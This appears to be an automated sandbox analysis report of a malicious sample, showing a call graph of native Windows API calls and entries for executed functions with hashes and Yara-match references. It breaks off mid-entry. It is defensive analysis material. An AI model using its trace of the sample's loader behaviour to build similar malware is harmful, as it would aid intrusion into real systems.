NtClose LdrInitializeThunk LdrInitializeThunk 96738->96840 96740 414c87 96739->96740 96741 414c6f 96739->96741 96740->96730 96797 414400 96740->96797 96785 4146e0 96741->96785 96744 414c60 96744->96686 96747 414c7d 96747->96686 96749 414d1c 96845 41a450 96749->96845 96751 414c9f 96751->96686 96752 414d28 96752->96686 96754 41b0c1 96753->96754 96755 41b0d3 96754->96755 96866 41bd00 96754->96866 96755->96689 96757 41b0f4 96869 414060 96757->96869 96759 41b140 96759->96689 96760 41b117 96760->96759 96761 414060 3 API calls 96760->96761 96763 41b139 96761->96763 96763->96759 96901 415380 96763->96901 96764 41b1ca 96765 41b1da 96764->96765 96995 41aec0 LdrLoadDll 96764->96995 96911 41ad30 96765->96911 96768 41b208 96990 419e80 96768->96990 96772 41af20 LdrLoadDll 96771->96772 96773 419edc 96772->96773 97023 1792c0a 96773->97023 96774 419ef7 96776 41bd80 96774->96776 96777 41b319 96776->96777 97026 41a630 96776->97026 96777->96652 96780 41af20 LdrLoadDll 96779->96780 96781 414b34 96780->96781 96781->96718 96781->96719 96781->96722 96783 41af20 LdrLoadDll 96782->96783 96784 41a33c NtCreateFile 96783->96784 96784->96723 96786 4146fc 96785->96786 96787 41a2a0 LdrLoadDll 96786->96787 96788 41471d 96787->96788 96789 414724 96788->96789 96790 414738 96788->96790 96791 41a450 2 API calls 96789->96791 96792 41a450 2 API calls 96790->96792 96794 41472d 96791->96794 96793 414741 96792->96793 96849 41bf90 LdrLoadDll RtlAllocateHeap 96793->96849 96794->96747 96796 41474c 96796->96747 96798 41444b 96797->96798 96799 41447e 96797->96799 96801 41a2a0 LdrLoadDll 96798->96801 96800 4145c9 96799->96800 96804 41449a 96799->96804 96803 41a2a0 LdrLoadDll 96800->96803 96802 414466 96801->96802 96805 41a450 2 API calls 96802->96805 96809 4145e4 96803->96809 96806 41a2a0 LdrLoadDll 96804->96806 96807 41446f 96805->96807 96808 4144b5 96806->96808 96807->96751 96811 4144d1 96808->96811 96812 4144bc 96808->96812 96862 41a2e0 LdrLoadDll 96809->96862 96815 4144d6 96811->96815 96816 4144ec 96811->96816 96814 41a450 2 API calls 96812->96814 96813 41461e 96817 41a450 2 API calls 96813->96817 96818 4144c5 96814->96818 96819 41a450 2 API calls 96815->96819 96824 4144f1 96816->96824 96850 41bf50 96816->96850 96820 414629 96817->96820 96818->96751 96821 4144df 96819->96821 96820->96751 96821->96751 96832 414503 96824->96832 96853 41a3d0 96824->96853 96825 414557 96826 41456e 96825->96826 96861 41a260 LdrLoadDll 96825->96861 96828 414575 96826->96828 96829 41458a 96826->96829 96831 41a450 2 API calls 96828->96831 96830 41a450 2 API calls 96829->96830 96833 414593 96830->96833 96831->96832 96832->96751 96834 4145bf 96833->96834 96856 41bb50 96833->96856 96834->96751 96836 4145aa 96837 41bd80 2 API calls 96836->96837 96838 4145b3 96837->96838 96838->96751 96839->96722 96840->96744 96842 414d04 96841->96842 96843 41af20 LdrLoadDll 96841->96843 96844 41a2e0 LdrLoadDll 96842->96844 96843->96842 96844->96749 96846 41a46c NtClose 96845->96846 96847 41af20 LdrLoadDll 96845->96847 96846->96752 96847->96846 96848->96732 96849->96796 96863 41a5f0 96850->96863 96852 41bf68 96852->96824 96854 41af20 LdrLoadDll 96853->96854 96855 41a3ec NtReadFile 96854->96855 96855->96825 96857 41bb74 96856->96857 96858 41bb5d 96856->96858 96857->96836 96858->96857 96859 41bf50 2 API calls 96858->96859 96860 41bb8b 96859->96860 96860->96836 96861->96826 96862->96813 96864 41af20 LdrLoadDll 96863->96864 96865 41a60c RtlAllocateHeap 96864->96865 96865->96852 96996 41a500 96866->96996 96868 41bd2d 96868->96757 96870 414071 96869->96870 96872 414079 96869->96872 96870->96760 96871 41434c 96871->96760 96872->96871 96999 41cef0 96872->96999 96874 4140cd 96875 41cef0 2 API calls 96874->96875 96879 4140d8 96875->96879 96876 414126 96878 41cef0 2 API calls 96876->96878 96882 41413a 96878->96882 96879->96876 96880 41d020 3 API calls 96879->96880 97010 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 96879->97010 96880->96879 96881 414197 96883 41cef0 2 API calls 96881->96883 96882->96881 97004 41d020 96882->97004 96884 4141ad 96883->96884 96886 4141ea 96884->96886 96888 41d020 3 API calls 96884->96888 96887 41cef0 2 API calls 96886->96887 96889 4141f5 96887->96889 96888->96884 96890 41d020 3 API calls 96889->96890 96896 41422f 96889->96896 96890->96889 96892 414324 97012 41cf50 LdrLoadDll RtlFreeHeap 96892->97012 96894 41432e 97013 41cf50 LdrLoadDll RtlFreeHeap 96894->97013 97011 41cf50 LdrLoadDll RtlFreeHeap 96896->97011 96897 414338 97014 41cf50 LdrLoadDll RtlFreeHeap 96897->97014 96899 414342 97015 41cf50 LdrLoadDll RtlFreeHeap 96899->97015 96902 415391 96901->96902 96903 414a40 8 API calls 96902->96903 96904 4153a7 96903->96904 96905 4153e2 96904->96905 96906 4153f5 96904->96906 96909 4153fa 96904->96909 96908 41bd80 2 API calls 96905->96908 96907 41bd80 2 API calls 96906->96907 96907->96909 96910 4153e7 96908->96910 96909->96764 96910->96764 97016 41abf0 96911->97016 96913 41ad44 96914 41abf0 LdrLoadDll 96913->96914 96915 41ad4d 96914->96915 96916 41abf0 LdrLoadDll 96915->96916 96917 41ad56 96916->96917 96918 41abf0 LdrLoadDll 96917->96918 96919 41ad5f 96918->96919 96920 41abf0 LdrLoadDll 96919->96920 96921 41ad68 96920->96921 96922 41abf0 LdrLoadDll 96921->96922 96923 41ad71 96922->96923 96924 41abf0 LdrLoadDll 96923->96924 96925 41ad7d 96924->96925 96926 41abf0 LdrLoadDll 96925->96926 96927 41ad86 96926->96927 96928 41abf0 LdrLoadDll 96927->96928 96929 41ad8f 96928->96929 96930 41abf0 LdrLoadDll 96929->96930 96931 41ad98 96930->96931 96932 41abf0 LdrLoadDll 96931->96932 96933 41ada1 96932->96933 96934 41abf0 LdrLoadDll 96933->96934 96935 41adaa 96934->96935 96936 41abf0 LdrLoadDll 96935->96936 96937 41adb6 96936->96937 96938 41abf0 LdrLoadDll 96937->96938 96939 41adbf 96938->96939 96940 41abf0 LdrLoadDll 96939->96940 96941 41adc8 96940->96941 96942 41abf0 LdrLoadDll 96941->96942 96943 41add1 96942->96943 96944 41abf0 LdrLoadDll 96943->96944 96945 41adda 96944->96945 96946 41abf0 LdrLoadDll 96945->96946 96947 41ade3 96946->96947 96948 41abf0 LdrLoadDll 96947->96948 96949 41adef 96948->96949 96950 41abf0 LdrLoadDll 96949->96950 96951 41adf8 96950->96951 96952 41abf0 LdrLoadDll 96951->96952 96953 41ae01 96952->96953 96954 41abf0 LdrLoadDll 96953->96954 96955 41ae0a 96954->96955 96956 41abf0 LdrLoadDll 96955->96956 96957 41ae13 96956->96957 96958 41abf0 LdrLoadDll 96957->96958 96959 41ae1c 96958->96959 96960 41abf0 LdrLoadDll 96959->96960 96961 41ae28 96960->96961 96962 41abf0 LdrLoadDll 96961->96962 96963 41ae31 96962->96963 96964 41abf0 LdrLoadDll 96963->96964 96965 41ae3a 96964->96965 96966 41abf0 LdrLoadDll 96965->96966 96967 41ae43 96966->96967 96968 41abf0 LdrLoadDll 96967->96968 96969 41ae4c 96968->96969 96970 41abf0 LdrLoadDll 96969->96970 96971 41ae55 96970->96971 96972 41abf0 LdrLoadDll 96971->96972 96973 41ae61 96972->96973 96974 41abf0 LdrLoadDll 96973->96974 96975 41ae6a 96974->96975 96976 41abf0 LdrLoadDll 96975->96976 96977 41ae73 96976->96977 96978 41abf0 LdrLoadDll 96977->96978 96979 41ae7c 96978->96979 96980 41abf0 LdrLoadDll 96979->96980 96981 41ae85 96980->96981 96982 41abf0 LdrLoadDll 96981->96982 96983 41ae8e 96982->96983 96984 41abf0 LdrLoadDll 96983->96984 96985 41ae9a 96984->96985 96986 41abf0 LdrLoadDll 96985->96986 96987 41aea3 96986->96987 96988 41abf0 LdrLoadDll 96987->96988 96989 41aeac 96988->96989 96989->96768 96991 41af20 LdrLoadDll 96990->96991 96992 419e9c 96991->96992 97022 1792df0 LdrInitializeThunk 96992->97022 96993 419eb3 96993->96689 96995->96765 96997 41a51c NtAllocateVirtualMemory 96996->96997 96998 41af20 LdrLoadDll 96996->96998 96997->96868 96998->96997 97000 41cf00 96999->97000 97001 41cf06 96999->97001 97000->96874 97002 41bf50 2 API calls 97001->97002 97003 41cf2c 97002->97003 97003->96874 97005 41cf90 97004->97005 97006 41cfed 97005->97006 97007 41bf50 2 API calls 97005->97007 97006->96882 97008 41cfca 97007->97008 97009 41bd80 2 API calls 97008->97009 97009->97006 97010->96879 97011->96892 97012->96894 97013->96897 97014->96899 97015->96871 97017 41ac0b 97016->97017 97018 414e40 LdrLoadDll 97017->97018 97019 41ac2b 97018->97019 97020 414e40 LdrLoadDll 97019->97020 97021 41acd7 97019->97021 97020->97021 97021->96913 97021->97021 97022->96993 97024 1792c1f LdrInitializeThunk 97023->97024 97025 1792c11 97023->97025 97024->96774 97025->96774 97027 41af20 LdrLoadDll 97026->97027 97028 41a64c RtlFreeHeap 97027->97028 97028->96777 97030 407eb0 97029->97030 97031 407eab 97029->97031 97032 41bd00 2 API calls 97030->97032 97031->96697 97033 407ed5 97032->97033 97034 407f38 97033->97034 97035 419e80 2 API calls 97033->97035 97036 407f3e 97033->97036 97041 41bd00 2 API calls 97033->97041 97045 41a580 97033->97045 97034->96697 97035->97033 97037 407f64 97036->97037 97039 41a580 2 API calls 97036->97039 97037->96697 97040 407f55 97039->97040 97040->96697 97041->97033 97043 41a580 2 API calls 97042->97043 97044 40817e 97043->97044 97044->96654 97046 41a59c 97045->97046 97047 41af20 LdrLoadDll 97045->97047 97050 1792c70 LdrInitializeThunk 97046->97050 97047->97046 97048 41a5b3 97048->97033 97050->97048 97052 41b583 97051->97052 97055 40ace0 97052->97055 97056 40ad04 97055->97056 97057 40ad40 LdrLoadDll 97056->97057 97058 409c4b 97056->97058 97057->97058 97058->96662 97060 40b053 97059->97060 97060->97060 97061 40b0d0 97060->97061 97074 419c50 LdrLoadDll 97060->97074 97061->96667 97064 41af20 LdrLoadDll 97063->97064 97065 40f1ab 97064->97065 97065->96670 97066 41a790 97065->97066 97067 41a7af LookupPrivilegeValueW 97066->97067 97068 41af20 LdrLoadDll 97066->97068 97067->96672 97068->97067 97070 41a23c 97069->97070 97071 41af20 LdrLoadDll 97069->97071 97075 1792ea0 LdrInitializeThunk 97070->97075 97071->97070 97072 41a25b 97072->96673 97074->97061 97075->97072 97077 40b1b9 97076->97077 97078 40b030 LdrLoadDll 97077->97078 97079 40b1f4 97078->97079 97079->96609 97081 40ae41 97080->97081 97082 40ae3d 97080->97082 97083 40ae8c 97081->97083 97085 40ae5a 97081->97085 97082->96612 97127 419c90 LdrLoadDll 97083->97127 97126 419c90 LdrLoadDll 97085->97126 97086 40ae9d 97086->96612 97088 40ae7c 97088->96612 97090 40f490 3 API calls 97089->97090 97091 4143b6 97090->97091 97091->96614 97093 408a79 97092->97093 97128 4087a0 97092->97128 97095 408a9d 97093->97095 97096 4087a0 19 API calls 97093->97096 97095->96616 97097 408a8a 97096->97097 97097->97095 97146 40f700 10 API calls 97097->97146 97100 41af20 LdrLoadDll 97099->97100 97101 41a4dc 97100->97101 97266 1792e80 LdrInitializeThunk 97101->97266 97102 40c312 97104 40f490 97102->97104 97105 40f4ad 97104->97105 97267 419f80 97105->97267 97108 40f4f5 97108->96620 97109 419fd0 2 API calls 97110 40f51e 97109->97110 97110->96620 97112 419fec 97111->97112 97113 41af20 LdrLoadDll 97111->97113 97273 1792d10 LdrInitializeThunk 97112->97273 97113->97112 97114 40c375 97114->96626 97114->96629 97117 41af20 LdrLoadDll 97116->97117 97118 41a03c 97117->97118 97274 1792d30 LdrInitializeThunk 97118->97274 97119 40c449 97119->96637 97122 41af20 LdrLoadDll 97121->97122 97123 419dfc 97122->97123 97275 1792fb0 LdrInitializeThunk 97123->97275 97124 40c49c 97124->96641 97126->97088 97127->97086 97129 407ea0 4 API calls 97128->97129 97133 4087ba 97128->97133 97129->97133 97130 408a49 97130->97093 97131 408a3f 97132 408160 2 API calls 97131->97132 97132->97130 97133->97130 97133->97131 97136 419ec0 2 API calls 97133->97136 97138 41a450 LdrLoadDll NtClose 97133->97138 97141 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97133->97141 97144 419de0 2 API calls 97133->97144 97147 419cd0 97133->97147 97151 4085d0 97133->97151 97163 40f5e0 LdrLoadDll NtClose 97133->97163 97164 419d50 LdrLoadDll 97133->97164 97165 419d80 LdrLoadDll 97133->97165 97166 419e10 LdrLoadDll 97133->97166 97167 4083a0 97133->97167 97183 405f60 LdrLoadDll 97133->97183 97136->97133 97138->97133 97141->97133 97144->97133 97146->97095 97148 419cdf 97147->97148 97149 41af20 LdrLoadDll 97148->97149 97150 419cec 97149->97150 97150->97133 97152 4085e6 97151->97152 97184 419840 97152->97184 97154 4085ff 97159 408771 97154->97159 97205 4081a0 97154->97205 97156 4086e5 97157 4083a0 11 API calls 97156->97157 97156->97159 97158 408713 97157->97158 97158->97159 97160 419ec0 2 API calls 97158->97160 97159->97133 97161 408748 97160->97161 97161->97159 97162 41a4c0 2 API calls 97161->97162 97162->97159 97163->97133 97164->97133 97165->97133 97166->97133 97168 4083c9 97167->97168 97245 408310 97168->97245 97171 41a4c0 2 API calls 97172 4083dc 97171->97172 97172->97171 97173 408467 97172->97173 97175 408462 97172->97175 97253 40f660 97172->97253 97173->97133 97174 41a450 2 API calls 97176 40849a 97174->97176 97175->97174 97176->97173 97177 419cd0 LdrLoadDll 97176->97177 97178 4084ff 97177->97178 97178->97173 97257 419d10 97178->97257 97180 408563 97180->97173 97181 414a40 8 API calls 97180->97181 97182 4085b8 97181->97182 97182->97133 97183->97133 97185 41bf50 2 API calls 97184->97185 97186 419857 97185->97186 97212 409310 97186->97212 97188 419872 97189 4198b0 97188->97189 97190 419899 97188->97190 97193 41bd00 2 API calls 97189->97193 97191 41bd80 2 API calls 97190->97191 97192 4198a6 97191->97192 97192->97154 97194 4198ea 97193->97194 97195 41bd00 2 API calls 97194->97195 97196 419903 97195->97196 97202 419ba4 97196->97202 97218 41bd40 97196->97218 97199 419b90 97200 41bd80 2 API calls 97199->97200 97201 419b9a 97200->97201 97201->97154 97203 41bd80 2 API calls 97202->97203 97204 419bf9 97203->97204 97204->97154 97206 40829f 97205->97206 97207 4081b5 97205->97207 97206->97156 97207->97206 97208 414a40 8 API calls 97207->97208 97209 408222 97208->97209 97210 41bd80 2 API calls 97209->97210 97211 408249 97209->97211 97210->97211 97211->97156 97213 409335 97212->97213 97214 40ace0 LdrLoadDll 97213->97214 97215 409368 97214->97215 97217 40938d 97215->97217 97221 40cf10 97215->97221 97217->97188 97239 41a540 97218->97239 97222 40cf3c 97221->97222 97223 41a1a0 LdrLoadDll 97222->97223 97224 40cf55 97223->97224 97225 40cf5c 97224->97225 97232 41a1e0 97224->97232 97225->97217 97229 40cf97 97230 41a450 2 API calls 97229->97230 97231 40cfba 97230->97231 97231->97217 97233 41a1fc 97232->97233 97234 41af20 LdrLoadDll 97232->97234 97238 1792ca0 LdrInitializeThunk 97233->97238 97234->97233 97235 40cf7f 97235->97225 97237 41a7d0 LdrLoadDll 97235->97237 97237->97229 97238->97235 97240 41af20 LdrLoadDll 97239->97240 97241 41a55c 97240->97241 97244 1792f90 LdrInitializeThunk 97241->97244 97242 419b89 97242->97199 97242->97202 97244->97242 97246 408328 97245->97246 97247 408343 97246->97247 97248 40ace0 LdrLoadDll 97246->97248 97249 414e40 LdrLoadDll 97247->97249 97248->97247 97250 408353 97249->97250 97251 40835c PostThreadMessageW 97250->97251 97252 408370 97250->97252 97251->97252 97252->97172 97254 40f673 97253->97254 97260 419e50 97254->97260 97258 419d2c 97257->97258 97259 41af20 LdrLoadDll 97257->97259 97258->97180 97259->97258 97261 419e6c 97260->97261 97262 41af20 LdrLoadDll 97260->97262 97265 1792dd0 LdrInitializeThunk 97261->97265 97262->97261 97263 40f69e 97263->97172 97265->97263 97266->97102 97268 419f9c 97267->97268 97269 41af20 LdrLoadDll 97267->97269 97272 1792f30 LdrInitializeThunk 97268->97272 97269->97268 97270 40f4ee 97270->97108 97270->97109 97272->97270 97273->97114 97274->97119 97275->97124 97279 1792ad0 LdrInitializeThunk

                                                                                                                                            Executed Functions

                                                                                                                                            Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                                            APIs
                                                                                                                                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID: !JA$bMA$bMA
                                                                                                                                            • API String ID: 2738559852-4222312340
                                                                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                            • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                            • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                                            Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 268 40ace0-40acfc 269 40ad04-40ad09 268->269 270 40acff call 41cc10 268->270 271 40ad0b-40ad0e 269->271 272 40ad0f-40ad1d call 41d030 269->272 270->269 275 40ad2d-40ad3e call 41b460 272->275 276 40ad1f-40ad2a call 41d2b0 272->276 281 40ad40-40ad54 LdrLoadDll 275->281 282 40ad57-40ad5a 275->282 276->275 281->282
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                            • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                            • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                                            Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 283 41a320-41a371 call 41af20 NtCreateFile
                                                                                                                                            APIs
                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                            • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                            • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                            Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 286 41a500-41a516 287 41a51c-41a53d NtAllocateVirtualMemory 286->287 288 41a517 call 41af20 286->288 288->287
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                            • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                            • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                            Function 0041A4FB Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 289 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                            • Opcode ID: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                                            • Instruction ID: 94507bbf397dcc5c3ac71cc5815c082cb0521fc5d078fd0b1a8f82b8904cbc8a
                                                                                                                                            • Opcode Fuzzy Hash: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                                            • Instruction Fuzzy Hash: 48F030B62001496BCB15DF98DC85CA777A9BF88214B15865EFD489B203C634D865CBA0
                                                                                                                                            Function 0041A44B Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                                            • Instruction ID: 85268407bda5badd3f005600f786efbf3729bfdc64a558162e38e0f63659b094
                                                                                                                                            • Opcode Fuzzy Hash: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                                            • Instruction Fuzzy Hash: 00E0C272200204AFDB20DFA9DC89FEB7B68EF44364F14455AFA0CDB282C531E6118B90
                                                                                                                                            Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                            • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                            • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                                            Function 01792B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 88415975a41e7ac61ff931bca4e8b1d9f758cc42794afb0c7ceb9012e23bff74
                                                                                                                                            • Instruction ID: 12d7ebf5174ceaa7811a245f4774e7774467df854912f2606075ad35dbf1aec8
                                                                                                                                            • Opcode Fuzzy Hash: 88415975a41e7ac61ff931bca4e8b1d9f758cc42794afb0c7ceb9012e23bff74
                                                                                                                                            • Instruction Fuzzy Hash: FA9002A170640003420571984424616800A97E0202B95C131E10145A0DC5258A916226
                                                                                                                                            Function 01792BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: a9748b509f974c50bf53c84f3123e235aac9c527148dbf38835229bb2d5f7720
                                                                                                                                            • Instruction ID: 084a8acc741c9e8a3a25d99fc450d31364c7eb0c28937a69ae26a775d3c2b1d4
                                                                                                                                            • Opcode Fuzzy Hash: a9748b509f974c50bf53c84f3123e235aac9c527148dbf38835229bb2d5f7720
                                                                                                                                            • Instruction Fuzzy Hash: A890027170540802D2807198441464A400597D1302FD5C125A0025664DCA158B5977A2
                                                                                                                                            Function 01792AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
